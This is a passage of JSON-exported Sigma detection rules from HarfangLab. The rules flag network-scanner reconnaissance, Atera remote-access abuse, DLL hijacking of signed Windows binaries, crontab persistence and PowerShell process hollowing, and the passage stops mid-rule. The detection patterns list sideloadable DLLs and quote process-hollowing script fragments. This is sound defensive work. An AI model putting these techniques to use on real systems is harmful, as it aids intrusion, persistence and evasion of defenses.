"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.083508Z",
"creation_date": "2026-03-23T11:45:34.083510Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.083515Z",
"rule_level": "high",
"rule_confidence": "moderate",
"rule_confidence_override": null,
"references": [
"https://www.softperfect.com/products/networkscanner/",
"https://www.microsoft.com/en-us/security/blog/2023/07/06/the-five-day-job-a-blackbyte-ransomware-intrusion-case-study/",
"https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/blackbyte-exbyte-ransomware",
"https://attack.mitre.org/techniques/T1046/"
],
"name": "t1046_softperfect_network_scanner.yml",
"content": "title: SoftPerfect Network Scanner Execution\nid: ae29f29b-fc65-464d-a199-837b6e64b76d\ndescription: |\n Detects the execution of SoftPerfect Network Scanner, a tool that may be used by adversaries during the reconnaissance phase to gather information and identify potential targets for lateral movement.\n SoftPerfect Network Scanner is a legitimate network scanning tool designed for network discovery and troubleshooting, but it can also be abused by attackers to map networks and identify systems of interest for exploitation.\n It is recommended to investigate the execution of SoftPerfect Network Scanner to determine if it has legitimate purposes, review network traffic for unusual scanning patterns, correlate with other reconnaissance activities.\n If this is legitimate and recurrent in your network, it is highly recommended to disable this rule.\nreferences:\n - https://www.softperfect.com/products/networkscanner/\n - https://www.microsoft.com/en-us/security/blog/2023/07/06/the-five-day-job-a-blackbyte-ransomware-intrusion-case-study/\n - https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/blackbyte-exbyte-ransomware\n - https://attack.mitre.org/techniques/T1046/\ndate: 2023/03/21\nmodified: 2025/02/06\nauthor: HarfangLab\ntags:\n - attack.discovery\n - attack.t1046\n - attack.t1135\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Behavior.NetworkScan\n - classification.Windows.Behavior.Discovery\n - classification.Windows.Behavior.Lateralization\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection:\n Company|contains: 'SoftPerfect' # SoftPerfect, SoftPerfect Research, SoftPerfect Pty Ltd\n Product:\n - 'Network Scanner'\n - 'SoftPerfect Network Scanner'\n\n condition: selection\nlevel: high\nconfidence: moderate\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "ae29f29b-fc65-464d-a199-837b6e64b76d",
"rule_name": "SoftPerfect Network Scanner Execution",
"rule_description": "Detects the execution of SoftPerfect Network Scanner, a tool that may be used by adversaries during the reconnaissance phase to gather information and identify potential targets for lateral movement.\nSoftPerfect Network Scanner is a legitimate network scanning tool designed for network discovery and troubleshooting, but it can also be abused by attackers to map networks and identify systems of interest for exploitation.\nIt is recommended to investigate the execution of SoftPerfect Network Scanner to determine if it has legitimate purposes, review network traffic for unusual scanning patterns, correlate with other reconnaissance activities.\nIf this is legitimate and recurrent in your network, it is highly recommended to disable this rule.\n",
"rule_creation_date": "2023-03-21",
"rule_modified_date": "2025-02-06",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.discovery"
],
"rule_technique_tags": [
"attack.t1046",
"attack.t1135"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "ae920411-dd3a-4c3b-ac96-58123a3717c1",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.082978Z",
"creation_date": "2026-03-23T11:45:34.082980Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.082985Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://twitter.com/MaxRogers5/status/1572655029018038272",
"https://research.checkpoint.com/2022/can-you-trust-a-files-digital-signature-new-zloader-campaign-exploits-microsofts-signature-verification-putting-users-at-risk/",
"https://attack.mitre.org/techniques/T1219/002/"
],
"name": "t1219_002_suspicious_execution_of_atera_agent.yml",
"content": "title: Suspicious Atera Agent Execution\nid: ae920411-dd3a-4c3b-ac96-58123a3717c1\ndescription: |\n Detects suspicious execution of the legitimate remote access tool Atera Agent.\n Attackers can maliciously use Atera Agent by reconfiguring it to point to an attacker-controlled email address, thus providing remote access.\n It is recommended to investigate any actions taken by Atera and to determine if this RMM tool is expected in your environment.\nreferences:\n - https://twitter.com/MaxRogers5/status/1572655029018038272\n - https://research.checkpoint.com/2022/can-you-trust-a-files-digital-signature-new-zloader-campaign-exploits-microsofts-signature-verification-putting-users-at-risk/\n - https://attack.mitre.org/techniques/T1219/002/\ndate: 2022/09/26\nmodified: 2025/06/27\nauthor: HarfangLab\ntags:\n - attack.command_and_control\n - attack.t1219.002\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.RMM.Atera\n - classification.Windows.Behavior.CommandAndControl\n - classification.Windows.Behavior.InitialAccess\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection_process:\n OriginalFileName: 'AteraAgent.exe'\n\n selection_arg:\n CommandLine|contains: 'IntegratorLogin'\n\n selection_email:\n CommandLine|contains:\n - '@outlook'\n - '@hotmail'\n - '@msn'\n - '@aol'\n - '@yahoo'\n - '@live'\n - '@yandex'\n - '@gmail'\n - '@protonmail'\n - '@mail.ru'\n - '@mailto.plus'\n - '@dropmail'\n - '@firemail.com.br' # https://x.com/johnk3r/status/1854695923537805598\n\n condition: all of selection_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "ae920411-dd3a-4c3b-ac96-58123a3717c1",
"rule_name": "Suspicious Atera Agent Execution",
"rule_description": "Detects suspicious execution of the legitimate remote access tool Atera Agent.\nAttackers can maliciously use Atera Agent by reconfiguring it to point to an attacker-controlled email address, thus providing remote access.\nIt is recommended to investigate any actions taken by Atera and to determine if this RMM tool is expected in your environment.\n",
"rule_creation_date": "2022-09-26",
"rule_modified_date": "2025-06-27",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.command_and_control"
],
"rule_technique_tags": [
"attack.t1219.002"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "ae9dc9ce-dd60-4db1-a501-dc8fa2125417",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.618825Z",
"creation_date": "2026-03-23T11:45:34.618827Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.618832Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://wietze.github.io/blog/save-the-environment-variables",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_logonui.yml",
"content": "title: DLL Hijacking via logon.exe\nid: ae9dc9ce-dd60-4db1-a501-dc8fa2125417\ndescription: |\n Detects potential Windows DLL Hijacking via logon.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://wietze.github.io/blog/save-the-environment-variables\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2022/09/15\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'logonui.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith: '\\logoncontroller.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "ae9dc9ce-dd60-4db1-a501-dc8fa2125417",
"rule_name": "DLL Hijacking via logon.exe",
"rule_description": "Detects potential Windows DLL Hijacking via logon.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2022-09-15",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "ae9fae6e-37ff-4753-b87f-5414d285d5ea",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.098797Z",
"creation_date": "2026-03-23T11:45:34.098799Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.098803Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://securityintelligence.com/posts/windows-features-dll-sideloading/",
"https://github.com/xforcered/WFH",
"https://wietze.github.io/blog/save-the-environment-variables",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_netdom.yml",
"content": "title: DLL Hijacking via NETDO.exe\nid: ae9fae6e-37ff-4753-b87f-5414d285d5ea\ndescription: |\n Detects potential Windows DLL Hijacking via NETDO.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://securityintelligence.com/posts/windows-features-dll-sideloading/\n - https://github.com/xforcered/WFH\n - https://wietze.github.io/blog/save-the-environment-variables\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2022/09/15\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'NETDOM.EXE'\n ImageLoaded|endswith:\n - '\\credui.dll'\n - '\\cryptdll.dll'\n - '\\dnsapi.dll'\n - '\\dsparse.dll'\n - '\\dsrole.dll'\n - '\\logoncli.dll'\n - '\\netjoin.dll'\n - '\\netutils.dll'\n - '\\ntdsapi.dll'\n - '\\samcli.dll'\n - '\\srvcli.dll'\n - '\\sspicli.dll'\n - '\\wkscli.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "ae9fae6e-37ff-4753-b87f-5414d285d5ea",
"rule_name": "DLL Hijacking via NETDO.exe",
"rule_description": "Detects potential Windows DLL Hijacking via NETDO.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2022-09-15",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "af0bca45-967b-4f4e-9bec-257f493f23b7",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "low",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.608885Z",
"creation_date": "2026-03-23T11:45:34.608888Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.608896Z",
"rule_level": "low",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://attack.mitre.org/techniques/T1204/"
],
"name": "t1204_harfanglab_eicar.yml",
"content": "title: Harfanglab EICAR (Windows)\nid: af0bca45-967b-4f4e-9bec-257f493f23b7\ndescription: |\n This is a test rule that detects the string 'EICAR-STANDARD-HARFANGLAB-TEST-STRING' inside the command-line of a process.\n EICAR files are files that were originally used to test the response of computer AV programs. HarfangLab has used this concept to create a test rule for its EDR.\n This does not represent inherently malicious activity and there should be no need for investigation if these tests are expected in your environment.\n If this rule has triggered, it means that HarfangLab EDR detection engines are operating properly.\nreferences:\n - https://attack.mitre.org/techniques/T1204/\ndate: 2021/06/22\nmodified: 2025/01/28\nauthor: HarfangLab\ntags:\n - attack.execution\n - attack.t1204\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Malware.EICAR\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection:\n CommandLine|contains: 'EICAR-STANDARD-HARFANGLAB-TEST-STRING'\n condition: selection\nlevel: low\nconfidence: strong",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "af0bca45-967b-4f4e-9bec-257f493f23b7",
"rule_name": "Harfanglab EICAR (Windows)",
"rule_description": "This is a test rule that detects the string 'EICAR-STANDARD-HARFANGLAB-TEST-STRING' inside the command-line of a process.\nEICAR files are files that were originally used to test the response of computer AV programs. HarfangLab has used this concept to create a test rule for its EDR.\nThis does not represent inherently malicious activity and there should be no need for investigation if these tests are expected in your environment.\nIf this rule has triggered, it means that HarfangLab EDR detection engines are operating properly.\n",
"rule_creation_date": "2021-06-22",
"rule_modified_date": "2025-01-28",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.execution"
],
"rule_technique_tags": [
"attack.t1204"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "af24b126-2721-4de0-82bf-9eda04d35316",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.089264Z",
"creation_date": "2026-03-23T11:45:34.089266Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.089270Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.cadosecurity.com/blog/from-automation-to-exploitation-the-growing-misuse-of-selenium-grid-for-cryptomining-and-proxyjacking",
"https://www.trellix.com/en-au/about/newsroom/stories/xdr/using-mitre-advance-trellix-products.html",
"https://attack.mitre.org/techniques/T1053/003/"
],
"name": "t1053_003_crontab_suspicious_execution_linux.yml",
"content": "title: Suspicious Crontab Execution (Linux)\nid: af24b126-2721-4de0-82bf-9eda04d35316\ndescription: |\n Detects a suspicious execution of the crontab command.\n Attackers can use crontab to add malicious cron jobs to establish persistence.\n It is recommended to investigate the parent process of crontab as well as the potential creation of cron jobs to determine whether this action was legitimate.\nreferences:\n - https://www.cadosecurity.com/blog/from-automation-to-exploitation-the-growing-misuse-of-selenium-grid-for-cryptomining-and-proxyjacking\n - https://www.trellix.com/en-au/about/newsroom/stories/xdr/using-mitre-advance-trellix-products.html\n - https://attack.mitre.org/techniques/T1053/003/\ndate: 2024/09/27\nmodified: 2025/01/31\nauthor: HarfangLab\ntags:\n - attack.execution\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1053.003\n - classification.Linux.Source.ProcessCreation\n - classification.Linux.LOLBin.Crontab\n - classification.Linux.Behavior.Persistence\nlogsource:\n category: process_creation\n product: linux\ndetection:\n selection1:\n CommandLine: '*echo*|*crontab -'\n\n selection2:\n CommandLine: 'crontab -'\n\n filter_selection2:\n ParentImage:\n - '/bin/sh'\n - '/bin/bash'\n - '/bin/csh'\n - '/bin/dash'\n - '/bin/ksh'\n - '/bin/tcsh'\n - '/bin/zsh'\n - '/usr/bin/bash'\n - '/usr/bin/dash'\n\n exclusion_parent_selection1:\n ParentImage:\n - '/usr/sbin/veeamworker'\n - '/usr/sbin/veeamservice'\n\n exclusion_parent_selection2:\n ParentImage:\n - '/usr/sbin/veeamworker'\n - '/usr/sbin/veeamservice'\n\n exclusion_docker:\n Ancestors|contains:\n - '|/usr/bin/dockerd|'\n - '|/usr/bin/containerd-shim-runc-v2|'\n\n exclusion_puppet:\n ParentImage: '/opt/puppetlabs/puppet/bin/ruby'\n\n exclusion_nvidia:\n CommandLine|contains|all:\n - ' echo \"# NVIDIA SDK Manager updater'\n - 'updater.sh'\n ParentImage|endswith: 'sdkmanager-gui'\n\n exclusion_ibm:\n ParentImage: '/IBM/InformationServer/Server/DSEngine/bin/dsapi_slave'\n\n # https://catalyst.earth/tutorial/installing-catalyst-professional-on-linux/\n exclusion_catalyst:\n ParentImage: '/opt/catalystpro/exe/catalystpro.exe'\n\n condition: (selection1 or (selection2 and not filter_selection2)) and not 1 of exclusion_*\nlevel: high\nconfidence: strong",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "af24b126-2721-4de0-82bf-9eda04d35316",
"rule_name": "Suspicious Crontab Execution (Linux)",
"rule_description": "Detects a suspicious execution of the crontab command.\nAttackers can use crontab to add malicious cron jobs to establish persistence.\nIt is recommended to investigate the parent process of crontab as well as the potential creation of cron jobs to determine whether this action was legitimate.\n",
"rule_creation_date": "2024-09-27",
"rule_modified_date": "2025-01-31",
"rule_os": "linux",
"rule_status": null,
"rule_tactic_tags": [
"attack.execution",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1053.003"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "af36e66f-17e7-4683-b412-ff4e992f0f4f",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.587151Z",
"creation_date": "2026-03-23T11:45:34.587155Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.587162Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows",
"https://github.com/xforcered/WFH",
"https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_rmactivate_ssp_isv.yml",
"content": "title: DLL Hijacking via rmactivate_ssp_isv.exe\nid: af36e66f-17e7-4683-b412-ff4e992f0f4f\ndescription: |\n Detects potential Windows DLL Hijacking via rmactivate_ssp_isv.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://github.com/xforcered/WFH\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2021/12/10\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'rmactivate_ssp_isv.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\CRYPTBASE.dll'\n - '\\cryptsp.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "af36e66f-17e7-4683-b412-ff4e992f0f4f",
"rule_name": "DLL Hijacking via rmactivate_ssp_isv.exe",
"rule_description": "Detects potential Windows DLL Hijacking via rmactivate_ssp_isv.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2021-12-10",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "af55dc31-5d7c-4332-a872-fccbee512a84",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.087162Z",
"creation_date": "2026-03-23T11:45:34.087164Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.087169Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://gist.github.com/xenoscr/99370ecffb07f629ae74e7808cb91450",
"https://attack.mitre.org/techniques/T1055/012/",
"https://attack.mitre.org/techniques/T1059/001/"
],
"name": "t1055_powershell_process_hollowing.yml",
"content": "title: Process Hollowed via PowerShell\nid: af55dc31-5d7c-4332-a872-fccbee512a84\ndescription: |\n Detects suspicious PowerShell patterns from open-source PowerShell scripts used for Process Hollowing.\n Process Hollowing is a technique for injecting code into processes to evade defenses by avoiding to write a malicious binary to disk.\n It consists in creating a new process in a suspended state from a targeted legitimate process in order to unmap some or all of its memory, and replace it with malicious code.\n It is recommended to investigate this script and the parent processes of the PowerShell interpreter that executed it to determine if the process injection was successful and to search for any malicious activity.\nreferences:\n - https://gist.github.com/xenoscr/99370ecffb07f629ae74e7808cb91450\n - https://attack.mitre.org/techniques/T1055/012/\n - https://attack.mitre.org/techniques/T1059/001/\ndate: 2024/04/18\nmodified: 2025/01/09\nauthor: HarfangLab\ntags:\n - attack.execution\n - attack.t1059.001\n - attack.t1106\n - attack.defense_evasion\n - attack.privilege_escalation\n - attack.t1055\n - attack.t1055.002\n - attack.t1055.003\n - attack.t1055.012\n - attack.t1055.013\n - classification.Windows.Source.PowerShellEvent\n - classification.Windows.Script.PowerShell\n - classification.Windows.Behavior.ProcessTampering\n - classification.Windows.Behavior.PrivilegeEscalation\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n category: powershell_event\n product: windows\ndetection:\n selection_base_cmdline:\n PowershellCommand|contains|all:\n - 'Start-Hollow'\n - '-Sponsor'\n - '-Hollow'\n\n # Auxiliary Function to Check PE target's architecture\n selection_pe_arch:\n PowershellCommand|contains|all:\n - '$BinPath = (Resolve-Path $Path -ErrorAction Stop).Path'\n - '$BinBytes = [System.IO.File]::ReadAllBytes($BinPath)'\n - \"[Int16]$PE = '0x{0}' -f ((($BinBytes[($PEOffset)..($PEOffset+1)]) | % {$_.ToString('X2')}) -join '')\"\n - \"[Int16]$PEArch = '0x{0}' -f ((($BinBytes[($OptOffset+1)..($OptOffset)]) | % {$_.ToString('X2')}) -join '')\"\n\n selection_get_pbi:\n PowershellCommand|contains|all:\n - '[UInt32]$RetLen = 0'\n - '$CallResult = [Hollow]::NtQueryInformationProcess($hProcess,0,[ref]$PROCESS_BASIC_INFORMATION,$PROCESS_BASIC_INFORMATION_Size, [ref]$RetLen)'\n\n selection_remote_params:\n PowershellCommand|contains:\n - 'WriteProcessMemory($hProcess,$pProcessParameters,$pProcessParameters,$ProcParamsLength,[ref]$BytesWritten)'\n - 